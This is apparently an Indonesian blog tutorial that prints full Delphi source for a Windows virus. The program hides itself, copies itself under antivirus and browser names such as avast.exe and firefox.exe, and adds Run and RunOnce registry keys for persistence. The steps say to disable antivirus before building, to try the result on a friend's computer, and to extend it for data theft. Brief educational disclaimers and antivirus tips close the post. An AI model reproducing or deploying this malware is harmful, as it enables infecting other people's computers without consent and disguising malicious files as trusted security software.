Cara Buatnya:
1. Buka Program Desktop Delphi anda lalu tambahkan 2 buah timer dari palette system tarik ke form, lihat gambar diatas.
2. Lalu Copy paste kode dibawah ini semuanya dan replace saja semua kode yang ada di form dengan kode dibawah ini.
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs,Shellapi,registry, Mmsystem, StdCtrls, ExtCtrls, jpeg;
type
TForm1 = class(TForm)
Timer1: TTimer;
Timer2: TTimer;
procedure Timer2Timer(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
{{$R MySoundRes.RES}
procedure TForm1.FormCreate(Sender: TObject);
var
regis: TRegistry;
reg1:TRegistry;
reg2:TRegistry;
windir:array[0..255] of char;
sysdir:array[0..255] of char;
begin
Application.ShowMainForm := false;
begin
getwindowsdirectory(windir,sizeof(windir));
getsystemdirectory(sysdir,sizeof(sysdir));
try
mkdir(sysdir+'\runfold');
except
end;
try
CopyFile(pchar(application.ExeName),PChar(windir+'\avast.exe'),true);
CopyFile(pchar(application.ExeName),PChar(windir+'\avg.exe'),true);
CopyFile(pchar(application.ExeName),PChar(windir+'\smadav.exe'),true);
CopyFile(pchar(application.ExeName),PChar(windir+'\firefox.exe'),true);
except
end;
end;
begin
getsystemdirectory(sysdir,sizeof(sysdir));
try
SetFileAttributes(PChar(sysdir+'\runfold\-NET-SERVICES-.exe'), FILE_ATTRIBUTE_HIDDEN);
except
end;
end;
try
regis := TRegistry.Create;
regis.RootKey := HKEY_CURRENT_USER;
regis.OpenKey('Software', True);
regis.OpenKey('Microsoft', True);
regis.OpenKey('Windows', True);
regis.OpenKey('CurrentVersion', True);
regis.OpenKey('Policies', True);
regis.OpenKey('System', True);
regis.WriteString('DisableTaskMgr', '0'); {VALUE 0=NONAKTIF 1=AKTIF}
regis.CloseKey;
except
end;
begin
try
getsystemdirectory(sysdir,sizeof(sysdir));
reg1 := TRegistry.Create;
reg1.RootKey := HKEY_LOCAL_MACHINE;
if reg1.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run',True) then
reg1.WriteString('.NET.',sysdir+'\runfold\-NET-SERVICES-.exe');
reg1.CloseKey;
reg2 := TRegistry.Create;
reg2.RootKey := HKEY_LOCAL_MACHINE;
if reg2.OpenKey('Software\Microsoft\Windows\CurrentVersion\RunOnce',True) then
reg2.WriteString('.NET.',sysdir+'\runfold\-NET-SERVICES-.exe');
reg2.CloseKey;
except
end;
end;
end;
procedure TForm1.Timer1Timer(Sender: TObject);
begin
try
ShellExecute(0, 'open', 'www.indoblog.me', nil, nil, SW_NORMAL);
mciSendString('Set CD Audio Door Open', nil, 0, handle);
except
end;
timer2.Enabled:= true;
timer1.Enabled:= false;
end;
procedure TForm1.Timer2Timer(Sender: TObject);
begin
try
mciSendString('Set CD Audio Door Closed', nil, 0, handle);
except
end;
timer1.Enabled:= true;
timer2.Enabled:= false;
end;
end.
3. Jika sudah jangan langsung di build dulu karena file exe tidak bisa
dibuild karena virus diatas akan dideteksi oleh avast untuk antivirus
yang lainnya belum admin coba apakah kedetek atau tidak. sedangkan
dengan smadav pun tidak bisa dideteksi.
4. Sebelum di build matikan dulu antivirusnya, santai saja yang penting
anda tidak mencoba untuk mengklik hasil buildnya saja atau file exenya.
5. Perhatikan Tulisan exe yang berwarna biru ada avast.exe, smadav.exe,
avg.exe, firefox.exe silahkan anda tambahkan semau yang anda suka.
6. Silahkan hasil buildnya anda kemas atau kurungin dengan 7zip atau
winrar lalu test dengan komputer teman anda dan silakan anda coba klik
aplikasinya, ingat resiko ditanggung sendiri jika system komputernya
rusak disini hanya semata mata sebagai pelajaran saja.
7. Anda bisa mengembangkan kembali kode diatas untuk tujuan lainnya,
misal untuk pencurian data di internet tetapi untuk pencurian data di
internet anda harus punya koneksi untuk penyebarannya dan tentu jika
ingin realtime anda harus punya database/server untuk tempat penampungan
hasil pengambilan datanya dan tentunya anda juga harus memasukan atau
menambahkan listing kodenya sesuai prihal tersebut.
8. Postingan ini hanya sebagai buat pelajaran saja dan pembelajaran saja
dan sebagai pebanding dengan model model virus terbaru dan sebagai
bahan test da ujicoba.
9. Hati-hati jika anda menyimpan password sebuah akun yang tersimpan
otomais di browser karena saat ini ada model virus baru buatan orang
inggris yang mampu mencuri akun yang tersimpan di sebuah browser dengan
memanfaatkan system cokie.
10. Selalu update antivirus terbaru untuk mengantisifasi hal hal yang
tidak diinginkan dan selalu hati hati dengan file exe yang mirip dengan
suatu aplikasi yang sering anda gunakan jika letak aplikasinya berpindah
dari tempat yang seharusnya.
11. Kunci utama penyebaran virus di komputer anda adalah ketika file
virusnya anda klik dan tentunya berarti anda telah mengeksekusi virusnya
atau membuatnya berkeliaran di komputer anda, dan matikan beberapa
aplikasi atau program yang berjalan pada startup.
12. Tips terakhir jika komputer anda sudah terlanjur terserang malware
silahkan reboot ulang dan scan secara boot-time, karena pada waktu
boot-time virus tidak akan bergerak dan berjalan, karena pada saat ini
penyerangan virus terbanyak adalah pada system windows dan android.
0 komentar:
Posting Komentar